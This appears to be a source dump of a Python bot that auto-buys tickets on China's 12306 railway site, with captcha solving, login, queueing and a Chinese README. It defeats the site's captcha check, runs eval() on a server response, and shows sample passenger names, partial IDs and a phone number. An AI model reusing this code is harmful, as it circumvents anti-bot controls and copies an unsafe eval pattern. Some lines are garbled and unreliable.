copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' result = session.httpClint.send(codeImgUrl) try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(result) return result except OSError: print(u"验证码下载失败,可能ip被封,确认请手动请求: {0}".format(codeImgUrl)) def getPassCodeNewOrderAndLogin1(session, imgType): """ 获取验证码2 :param session: :param imgType: :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg1"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' codeImgUrlRsp = session.httpClint.send(codeImgUrl) if not isinstance(codeImgUrlRsp, str): print("验证码获取失败") return result = eval(codeImgUrlRsp.split("(")[1].split(")")[0]).get("image") try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(base64.b64decode(result)) return result except OSError: print(u"验证码下载失败,可能ip被封或者文件写入没权限") if __name__ == '__main__': pass File: inter/GetQueueCount.py # coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache import TickerConfig from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from config.urlConf import urls from inter.ConfirmSingleForQueue import confirmSingleForQueue from myException.ticketIsExitsException import ticketIsExitsException def conversion_int(str): return int(str) class getQueueCount: def __init__(self, session, is_need_code, 
ifShowPassCodeTime, set_type, station_dates, train_no, ticket_peoples, ticketInfoForPassengerForm, token, oldPassengerStr, passengerTicketStrList): self.station_dates = station_dates self.session = session self.is_need_code = is_need_code self.ifShowPassCodeTime = ifShowPassCodeTime self.set_type = set_type self.train_no = train_no self.ticket_peoples = ticket_peoples self.ticket_black_list = {} self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.token = token self.oldPassengerStr = oldPassengerStr self.passengerTicketStrList = passengerTicketStrList def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ), data['train_no'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['train_no'], data['stationTrainCode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'station_train_code'], data['seatType'] = self.set_type, data['fromStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'from_station'], data['toStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['to_station'], data['leftTicket'] = self.ticketInfoForPassengerForm['leftTicketStr'], data['purpose_codes'] = self.ticketInfoForPassengerForm['purpose_codes'], data['train_location'] = self.ticketInfoForPassengerForm['train_location'], data['REPEAT_SUBMIT_TOKEN'] = self.token, return data def sendGetQueueCount(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ getQueueCountResult = self.session.httpClint.send(self.session.urls["getQueueCountUrl"], self.data_par()) if "status" in getQueueCountResult and getQueueCountResult["status"] is True: if "countT" in getQueueCountResult["data"]: ticket = getQueueCountResult["data"]["ticket"] ticket_split = sum(map(conversion_int, ticket.split(","))) if ticket.find(",") != -1 else ticket countT = getQueueCountResult["data"]["countT"] if int(ticket_split) is 0: wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数还剩: {ticket_split} 张") return print(u"排队成功, 你排在: {1}位, 当前余票还剩余: {0} 张".format(ticket_split, countT)) csf = confirmSingleForQueue(self.session, self.ifShowPassCodeTime, self.is_need_code, self.token, self.set_type, self.ticket_peoples, self.ticketInfoForPassengerForm, self.oldPassengerStr, self.passengerTicketStrList) csf.sendConfirmSingleForQueue() # else: # print(u"当前排队人数: {1} 当前余票还剩余:{0} 张,继续排队中".format(ticket_split, countT)) else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountResult and getQueueCountResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 
{1}加入小黑屋".format(getQueueCountResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountResult and getQueueCountResult["validateMessages"]: print(str(getQueueCountResult["validateMessages"])) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: print(u"未知错误 {0}".format("".join(getQueueCountResult))) class queryQueueByAfterNate: def __init__(self, session): """ 候补排队 :param session: """ self.session = session def sendQueryQueueByAfterNate(self): for i in range(10): queryQueueByAfterNateRsp = self.session.httpClint.send(urls.get("queryQueue")) if not queryQueueByAfterNateRsp.get("status"): print("".join(queryQueueByAfterNateRsp.get("messages")) or queryQueueByAfterNateRsp.get("validateMessages")) time.sleep(1) else: sendEmail(ticket.WAIT_ORDER_SUCCESS) sendServerChan(ticket.WAIT_ORDER_SUCCESS) raise ticketIsExitsException(ticket.WAIT_AFTER_NATE_SUCCESS) if __name__ == '__main__': new_train_date = list(filter(None, str(time.asctime(time.strptime("2019-10-07", "%Y-%m-%d"))).split(" "))) print(new_train_date) train_date = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ) print(train_date) File: inter/AutoSubmitOrderRequest.py # coding=utf-8 import urllib from collections import OrderedDict from config.TicketEnmu import ticket from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetQueueCountAsync import getQueueCountAsync from inter.GetRandCode import getRandCode import TickerConfig class autoSubmitOrderRequest: """ 快读提交订单通道 """ def __init__(self, selectObj, secretStr, train_date, query_from_station_name, query_to_station_name, passengerTicketStr, oldPassengerStr, train_no, stationTrainCode, leftTicket, set_type,): self.set_type = set_type try: self.secretStr = urllib.unquote(secretStr) except AttributeError: self.secretStr = urllib.parse.unquote(secretStr) self.train_date = train_date self.query_from_station_name = query_from_station_name self.query_to_station_name = query_to_station_name self.passengerTicketStr = passengerTicketStr.rstrip("_{0}".format(self.set_type)) self.oldPassengerStr = oldPassengerStr self.session = selectObj self.train_no = train_no self.stationTrainCode = stationTrainCode self.leftTicket = leftTicket def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ data = OrderedDict() data["secretStr"] = self.secretStr data["train_date"] = self.train_date data["tour_flag"] = "dc" data["purpose_codes"] = "ADULT" data["query_from_station_name"] = TickerConfig.FROM_STATION data["query_to_station_name"] = TickerConfig.TO_STATION data["cancel_flag"] = 2 data["bed_level_order_num"] = "000000000000000000000000000000" data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr return data def sendAutoSubmitOrderRequest(self): """ 请求下单接口 :return: """ urls = self.session.urls["autoSubmitOrderRequest"] data = self.data_par() autoSubmitOrderRequestResult = self.session.httpClint.send(urls, data) if 
autoSubmitOrderRequestResult and \ autoSubmitOrderRequestResult.get("status", False) and\ autoSubmitOrderRequestResult.get("httpstatus", False) == 200: requestResultData = autoSubmitOrderRequestResult.get("data", {}) if requestResultData: result = requestResultData.get("result", "") ifShowPassCode = requestResultData.get("ifShowPassCode", "N") ifShowPassCodeTime = int(requestResultData.get("ifShowPassCodeTime", "1000")) / float(1000) print(ticket.AUTO_SUBMIT_ORDER_REQUEST_C) g = getQueueCountAsync(session=self.session, train_no=self.train_no, stationTrainCode=self.stationTrainCode, fromStationTelecode=self.query_from_station_name, toStationTelecode=self.query_to_station_name, leftTicket=self.leftTicket, set_type=self.set_type, users=len(TickerConfig.TICKET_PEOPLES), station_dates=self.train_date, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=result, ifShowPassCodeTime=ifShowPassCodeTime, ) if ifShowPassCode == "Y": # 如果需要验证码 print(u"需要验证码") print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, "") if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") g.sendGetQueueCountAsync() else: print(ticket.AUTO_SUBMIT_ORDER_REQUEST_F) if autoSubmitOrderRequestResult.get("messages", ""): print("".join(autoSubmitOrderRequestResult.get("messages", ""))) elif autoSubmitOrderRequestResult.get("validateMessages", ""): print("".join(autoSubmitOrderRequestResult.get("validateMessages", ""))) File: inter/GetSuccessRate.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.SubmitOrderRequest import submitOrderRequestByAfterNate class getSuccessRate: def __init__(self, session, secretList): """ 获取成功信息 """ self.secretList = secretList self.session = session def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["successSecret"] = f"{self.secretList}#{ticker}" data["_json_att"] = "" return data def sendSuccessRate(self): successRateRsp = self.session.httpClint.send(urls.get("getSuccessRate"), self.data_apr()) if not successRateRsp.get("status"): print("".join(successRateRsp.get("messages")) or successRateRsp.get("validateMessages")) return flag = successRateRsp.get("data", {}).get("flag")[0] train_no = flag.get("train_no") print(f"准备提交候补订单,{flag.get('info')}") submit = submitOrderRequestByAfterNate(self.session, self.secretList, train_no) submit.sendSubmitOrderRequest() File: inter/CheckRandCodeAnsyn.py # coding=utf-8 class checkRandCodeAnsyn: def __init__(self, session, randCode, token): self.session = session self.randCode = randCode self.token = token def data_par(self): """ :return: """ data = { "randCode": self.randCode, "rand": "randp", "_json_att": "", "REPEAT_SUBMIT_TOKEN": self.token } return data def sendCheckRandCodeAnsyn(self): """ 下单验证码识别 :return: """ checkRandCodeAnsynUrl = self.session.urls["checkRandCodeAnsyn"] 
fresult = self.session.httpClint.send(checkRandCodeAnsynUrl, self.data_par()) # 校验验证码是否正确 return fresult['data']['msg'] File: inter/GetPassengerDTOs.py # coding=utf-8 import json from config.TicketEnmu import ticket from myException.PassengerUserException import PassengerUserException import wrapcache import TickerConfig class getPassengerDTOs: """ 获取乘客信息 :return: """ def __init__(self, selectObj, ticket_peoples=None, set_type=None, is_more_ticket_num=None): """ :param session: 登录实例 :param ticket_peoples: 乘客 :param set_type: 坐席 """ if ticket_peoples is None: ticket_peoples = [] self.session = selectObj self.ticket_peoples = ticket_peoples self.is_more_ticket_num = is_more_ticket_num self.set_type = set_type def sendGetPassengerDTOs(self): getPassengerDTOsResult = self.session.httpClint.send(self.session.urls["get_passengerDTOs"], json.dumps({"_json_att": ""})) if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult["data"].get("normal_passengers", False): normal_passengers = getPassengerDTOsResult['data']['normal_passengers'] _normal_passenger = [normal_passengers[i] for i in range(len(normal_passengers)) if normal_passengers[i]["passenger_name"] in self.ticket_peoples] return _normal_passenger if _normal_passenger else [normal_passengers[0]] # 如果配置乘车人没有在账号,则默认返回第一个用户 else: if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult['data'].get("exMsg", False): print(getPassengerDTOsResult['data'].get("exMsg", False)) elif getPassengerDTOsResult.get('messages', False): print(getPassengerDTOsResult.get('messages', False)) else: print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") # raise PassengerUserException(ticket.DTO_NOT_FOUND) def getPassengerTicketStr(self, set_type): """ 获取getPassengerTicketStr 提交对应的代号码 :param str: 坐席 :return: """ passengerTicketStr = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } return str(passengerTicketStr[set_type.replace(' ', '')]) def getPassengerTicketStrListAndOldPassengerStr(self, secretStr, secretList): """ 获取提交车次人内容格式 passengerTicketStr O,0,1,文贤平,1,43052419950223XXXX,15618715583,N_O,0,1,梁敏,1,43052719920118XXXX,,N oldPassengerStr 文贤平,1,43052719920118XXXX,1_梁敏,1,43052719920118XXXX,1 ps: 如果is_more_ticket打开了的话,那就是读取联系人列表里面前符合车次数量的前几个联系人 :return: """ passengerTicketStrList = [] oldPassengerStr = [] tickers = [] set_type = "" if wrapcache.get("user_info"): # 如果缓存中有联系人方式,则读取缓存中的联系人 user_info = wrapcache.get("user_info") print(u"使用缓存中查找的联系人信息") else: user_info = self.sendGetPassengerDTOs() wrapcache.set("user_info", user_info, timeout=9999999) if not user_info: raise PassengerUserException(ticket.DTO_NOT_IN_LIST) if len(user_info) < self.is_more_ticket_num: # 如果乘车人填错了导致没有这个乘车人的话,可能乘车人数会小于自动乘车人 self.is_more_ticket_num = len(user_info) if secretStr: set_type = self.getPassengerTicketStr(self.set_type) if self.is_more_ticket_num is 1: passengerTicketStrList.append( '0,' + user_info[0]['passenger_type'] + "," + user_info[0][ "passenger_name"] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['mobile_no'] + ',N,' + user_info[0]["allEncStr"]) oldPassengerStr.append( user_info[0]['passenger_name'] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['passenger_type'] + '_') else: for i in range(self.is_more_ticket_num): passengerTicketStrList.append( '0,' + 
user_info[i]['passenger_type'] + "," + user_info[i][ "passenger_name"] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i][ 'passenger_id_no'] + "," + user_info[i]['mobile_no'] + ',N,' + user_info[i]["allEncStr"] + '_' + set_type) oldPassengerStr.append( user_info[i]['passenger_name'] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i]['passenger_id_no'] + "," + user_info[i]['passenger_type'] + '_') elif secretList: """ 候补订单有多少个联系人,就候补多少个联系人了,没有优先提交之说 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; """ for user in user_info: tickers.append(f"1#{user['passenger_name']}#1#{user['passenger_id_no']}#{user['allEncStr']};") return { "passengerTicketStrList": set_type + "," + ",".join(passengerTicketStrList), "passengerTicketStrByAfterLate": "".join(tickers), "oldPassengerStr": "".join(oldPassengerStr), "code": ticket.SUCCESS_CODE, "set_type": set_type, "status": True, "user_info": user_info, } File: inter/LoginAysnSuggest.py # coding=utf-8 from config.urlConf import urls def loginAysnSuggest(session, username, password): """ 登录接口 ps: 不需要验证码 :return: """ loginAysnSuggestUrls = urls.get("loginAysnSuggest") data = { "loginUserDTO.user_name": username, "userDTO.password": password } loginAysnSuggestRsp = session.httpClint.send(urls=loginAysnSuggestUrls, data=data) if loginAysnSuggestRsp and loginAysnSuggestRsp.get("httpstatus") is 200 and loginAysnSuggestRsp.get("data", {}).get("loginCheck") == "Y": print(u"登录成功") else: print(u"登录失败, {0} {1}".format("".join(loginAysnSuggestRsp.get("messages")), loginAysnSuggestRsp.get("validateMessages"))) File: inter/GetRandCode.py # coding=utf-8 from PIL import Image from config.urlConf import urls from myUrllib.httpUtils import HTTPClient from verify.localVerifyCode import Verify import TickerConfig import os if TickerConfig.AUTO_CODE_TYPE == 2: v = Verify() def getRandCode(is_auto_code, auto_code_type, result): """ 识别验证码 :return: 坐标 """ try: if is_auto_code: if auto_code_type == 1: print(u"打码兔已关闭, 如需使用自动识别,请使用如果平台 auto_code_type == 2") return elif auto_code_type == 2: Result = v.verify(result) return codexy(Ofset=Result, is_raw_input=False) elif auto_code_type == 3: print("您已设置使用云打码,但是服务器资源有限,请尽快改为本地打码" if "CAPTCHALOCAL" not in os.environ else "已设置本地打码服务器") http = HTTPClient(0) Result = http.send(urls.get("autoVerifyImage"), {"imageFile": result}) if Result and Result.get("code") is 0: return codexy(Ofset=Result.get("data"), is_raw_input=False) else: img = Image.open('./tkcode.png') img.show() return codexy() except Exception as e: print(e) def codexy(Ofset=None, is_raw_input=True): """ 获取验证码 :return: str """ if is_raw_input: print(u""" ***************** | 1 | 2 | 3 | 4 | ***************** | 5 | 6 | 7 | 8 | ***************** """) print(u"验证码分为8个,对应上面数字,例如第一和第二张,输入1, 2 如果开启cdn查询的话,会冲掉提示,直接鼠标点击命令行获取焦点,输入即可,不要输入空格") print(u"如果是linux无图形界面,请使用自动打码,is_auto_code: True") print(u"如果没有弹出验证码,请手动双击根目录下的tkcode.png文件") Ofset = input(u"输入对应的验证码: ") if isinstance(Ofset, list): select = Ofset else: Ofset = Ofset.replace(",", ",") select = Ofset.split(',') post = [] offsetsX = 0 # 选择的答案的left值,通过浏览器点击8个小图的中点得到的,这样基本没问题 offsetsY = 0 # 选择的答案的top值 for ofset in select: if ofset == '1': offsetsY = 77 offsetsX = 40 elif ofset == '2': offsetsY = 77 offsetsX = 112 elif ofset == '3': offsetsY = 77 offsetsX = 184 elif ofset == '4': offsetsY = 77 offsetsX = 256 elif ofset == '5': offsetsY = 149 offsetsX = 40 elif ofset == '6': offsetsY = 149 offsetsX = 112 elif ofset == '7': offsetsY = 149 offsetsX = 184 elif ofset 
== '8': offsetsY = 149 offsetsX = 256 else: pass post.append(offsetsX) post.append(offsetsY) randCode = str(post).replace(']', '').replace('[', '').replace("'", '').replace(' ', '') print(u"验证码识别坐标为{0}".format(randCode)) return randCode File: inter/ConfirmHB.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetQueueCount import queryQueueByAfterNate class confirmHB: def __init__(self, secretList, session, tickerNo, jzdhDate): """ 人脸识别 """ self.secretList = secretList self.session = session self.passengerTicketStrByAfterLate = session.passengerTicketStrByAfterLate self.tickerNo = tickerNo self.jzdhDate = jzdhDate def data_apr(self): """ passengerInfo 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; jzParam 2019-08-31#19#00 hbTrain 5l000G177230,O# lkParam :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["passengerInfo"] = self.passengerTicketStrByAfterLate data["jzParam"] = self.jzdhDate data["hbTrain"] = f"{self.tickerNo},{ticker}#" data["lkParam"] = "" return data def sendChechFace(self): ChechFaceRsp = self.session.httpClint.send(urls.get("confirmHB"), self.data_apr()) if not ChechFaceRsp.get("status"): print("".join(ChechFaceRsp.get("messages")) or ChechFaceRsp.get("validateMessages")) return data = ChechFaceRsp.get("data") if not data.get("flag"): print(f"错误信息:{data.get('msg')}") return queue = queryQueueByAfterNate(self.session) queue.sendQueryQueueByAfterNate() File: inter/GetQueueCountAsync.py import TickerConfig []# coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache from inter.ConfirmSingleForQueueAsys import confirmSingleForQueueAsys class getQueueCountAsync: """ 排队 """ def __init__(self, session, train_no, stationTrainCode, fromStationTelecode, toStationTelecode, leftTicket, set_type, users, station_dates, passengerTicketStr, oldPassengerStr, result, ifShowPassCodeTime): self.train_no = train_no self.session = session self.stationTrainCode = stationTrainCode self.fromStationTelecode = fromStationTelecode self.toStationTelecode = toStationTelecode self.set_type = set_type self.leftTicket = leftTicket self.users = users self.station_dates = station_dates self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result self.ifShowPassCodeTime=ifShowPassCodeTime def data_par(self): """ - 字段说明 - train_date 时间 - train_no 列车编号,查询代码里面返回 - stationTrainCode 列车编号 - seatType 对应坐席 - fromStationTelecode 起始城市 - toStationTelecode 到达城市 - leftTicket 查询代码里面返回 - purpose_codes 学生还是成人 - _json_att 没啥卵用,还是带上吧 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], time.strftime("%H:%M:%S", time.localtime(time.time())) ), data["train_no"] = self.train_no data["stationTrainCode"] = self.stationTrainCode data["seatType"] = self.set_type data["fromStationTelecode"] = self.fromStationTelecode data["toStationTelecode"] = self.toStationTelecode data["leftTicket"] = self.leftTicket data["purpose_codes"] = "ADULT" 
data["_json_att"] = "" return data def conversion_int(self, str): return int(str) def sendGetQueueCountAsync(self): """ 请求排队接口 :return: """ urls = self.session.urls["getQueueCountAsync"] data = self.data_par() getQueueCountAsyncResult = self.session.httpClint.send(urls, data) if getQueueCountAsyncResult.get("status", False) and getQueueCountAsyncResult.get("data", False): if "status" in getQueueCountAsyncResult and getQueueCountAsyncResult["status"] is True: if "countT" in getQueueCountAsyncResult["data"]: ticket_data = getQueueCountAsyncResult["data"]["ticket"] ticket_split = sum(map(self.conversion_int, ticket_data.split(","))) if ticket_data.find( ",") != -1 else ticket_data if int(ticket_split) is 0: # 增加余票数为0时,将车次加入小黑屋 wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数为{ticket_split}张") return print(u"排队成功, 当前余票还剩余: {0} 张".format(ticket_split)) c = confirmSingleForQueueAsys(session=self.session, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=self.result,) print(u"验证码提交安全期,等待{}MS".format(self.ifShowPassCodeTime)) time.sleep(self.ifShowPassCodeTime) c.sendConfirmSingleForQueueAsys() else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountAsyncResult and getQueueCountAsyncResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountAsyncResult and getQueueCountAsyncResult["validateMessages"]: print(str(getQueueCountAsyncResult["validateMessages"])) File: myException/ticketNumOutException.py class ticketNumOutException(Exception): pass File: myException/UserPasswordException.py class UserPasswordException(Exception): pass File: myException/ticketConfigException.py class ticketConfigException(Exception): pass File: myException/__init__.py File: myException/ticketIsExitsException.py class ticketIsExitsException(Exception): pass File: myException/balanceException.py class balanceException(Exception): pass File: myException/PassengerUserException.py class PassengerUserException(Exception): pass File: tmp/__init__.py File: tmp/log/__init__.py
### 12306 购票小助手 #### python版本 - [ ] 2.7.10 - 2.7.15 - [x] 3.6 - 3.7.4 - [ ] 2.7.9 #### 已有功能 - [x] 自动打码 - [x] 自动登录 - [x] 准点预售和捡漏 - [x] 智能候补 - [x] 邮件通知 - [x] server酱通知 #### 依赖库 - 验证码目前可以本地识别,需要下载模型,放于项目根目录,全部代码来源于此项目 [传送门](https://github.com/zhaipro/easy12306),表示感谢 ``` 1. 模型下载链接:https://pan.baidu.com/s/1rS155VjweWVWIJogakechA 密码:bmlm 群里面也可以下载 2. git仓库下载:https://github.com/testerSunshine/12306model.git ``` - 自托管云打码服务器搭建:[12306_code_server](https://github.com/YinAoXiong/12306_code_server) - 如果大家有空闲的服务器,可搭建之后在这个 [issues](https://github.com/testerSunshine/12306/issues/446) 里面填入自己的服务器(请注意服务器安全!) - 项目依赖 [requirements.txt](requirements.txt) - 安装方法x: - root用户(避免多python环境产生问题): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt` - 非root用户(避免安装和运行时使用了不同环境): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt` - 许多windows的用户装不了tensorflow的话,可以适当降低版本或者升高版本都是可以的 ``` 1. tensorflow的兼容版本 1.14.0rc\1.14.0rc\1.15.0\1.15.0rc 以上版本都测试无问题 2. 如果pip代理的清华源无法下载,可以更换其他源解决此问题 ``` #### 项目使用说明 - 服务器启动: - 修改[配置](TickerConfig.py)文件 - 可以配置邮箱,配置邮箱的格式在[配置](TickerConfig.py)里面可以看到ex ``` # 测试邮箱和server酱是否可用, server酱测试的前提是server酱开关开启 # 可以配置server酱提醒(推荐)[配置教程](https://www.jianshu.com/p/8d10b5b9c4e3) # 用python3 还是python 完全取决于安装的时候配置的环境变量是否为python3,以下启动默认环境变量为python3 python3 run.py t ``` - 配置[配置](TickerConfig.py)文件的时候,需注意空格和遵循python语法格式 - 启动前请先筛选cdn,这点很`重要` ``` python3 run.py c ``` - 启动服务 ``` python3 run.py r ``` - 如果你不知道如何操作,下面的命令可能会帮助你 ``` python3 run.py -h —————————————————————————— sage: run.py [-h] operate positional arguments: operate r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱 ``` - 如果你的服务器安装了docker与docker-compose, 那么你可以忽略上面的**所有**步骤,直接按以下步骤操作,即可开始抢票: - 前提条件: - 请确认你安装的docker版本为18.09及以上: `docker -v` - 请确认你安装的docker-compose版本为1.23.2及以上: `docker-compose -v` - 请根据自己需要修改好配置文件:`TickerConfig.py` - 请修改配置文件`TickerConfig.py`中的变量`AUTO_CODE_TYPE`和`HOST`,`AUTO_CODE_TYPE`改为`3`, HOST改为`"captcha:80"`(这里很重要,这是本地打码服务器的配置) - 运行命令: - 开始抢票:`docker-compose up --build -d` - 停止抢票:`docker-compose down` - 查看抢票log: `docker logs --follow ticket` #### 目录对应说明 - agency - cdn代理 - config - 项目配置 - verify - 自动打码 - init - 项目主运行目录 - inter - 接口 - myException - 异常 - myUrllib request网络请求库 #### 思路图 - ![image](uml/uml.png) #### 项目声明: - 本软件只供学习交流使用,勿作为商业用途,交流群号 - 1群:286271084(已满) - 2群:649992274(已满) - 3群:632501142(已满) - 4群: 606340519(已满) - 5群: 948526733(已满) - 7群: 660689659(已满) - 8群: 620629239(已满) - 6群: 608792930(未满) - 9群: 693035807(未满) - 请不要重复加群,一个群就可以了,把机会留给更多人 - **进群先看公告!!!进群先看公告!!!进群先看公告!!! 重要的事情说三遍** - 能为你抢到一张回家的票,是我最大的心愿 #### 日志列子 - 成功log,如果是购票失败的,请带上失败的log给我,我尽力帮你调,也可加群一起交流,程序只是加速买票的过程,并不一定能买到票 ``` 正在第355次查询 乘车日期: 2018-02-12 车次G4741,G2365,G1371,G1377,G1329 查询无票 代理设置 无 总耗时429ms 车次: G4741 始发车站: 上海 终点站: 邵阳 二等座:有 正在尝试提交订票... 尝试提交订单... 出票成功 排队成功, 当前余票还剩余: 359 张 正在使用自动识别验证码功能 验证码通过,正在提交订单 提交订单成功! 排队等待时间预计还剩 -12 ms 排队等待时间预计还剩 -6 ms 排队等待时间预计还剩 -7 ms 排队等待时间预计还剩 -4 ms 排队等待时间预计还剩 -4 ms 恭喜您订票成功,订单号为:EB52743573, 